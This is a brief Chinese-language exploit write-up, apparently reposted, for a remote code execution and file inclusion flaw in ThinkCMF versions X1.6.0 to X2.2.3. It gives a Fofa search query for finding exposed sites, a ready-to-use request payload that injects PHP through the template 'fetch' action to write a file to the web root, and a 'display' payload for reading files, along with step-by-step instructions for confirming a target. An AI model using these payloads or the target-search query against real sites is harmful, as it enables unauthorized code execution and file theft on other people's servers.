Thinkcmf遠程代碼執行&任意文件包含


0x01 漏洞描述

ThinkCMF是一款基於PHP+MYSQL開發的中文內容管理系統框架,底層采用ThinkPHP3.2.3構建。ThinkCMF提出靈活的應用機制,框架自身提供基礎的管理功能,而開發者可以根據自身的需求以應用的形式進行擴展。每個應用都能獨立的完成自己的任務,也可通過系統調用其他應用進行協同工作。在這種運行機制下,開發商場應用的用戶無需關心開發SNS應用時如何工作的,但他們之間又可通過系統本身進行協調,大大的降低了開發成本和溝通成本。

0x02 漏洞影響版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

0x03 Fofa

app="thinkcmf"

0x04 漏洞利用

根目錄寫入POC,根目錄訪問test.php:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

文件包含POC:

?a=display&templateFile=README.md

1.使用文件寫入poc進行測試,如果返回頁面為空白頁面則證明網站存在漏洞

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>


2.在網站根目錄訪問test.php

3.使用文件包含POC進行文件讀取

?a=display&templateFile=README.md

0x05 參考鏈接

https://www.cnblogs.com/yuzly/p/11797485.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM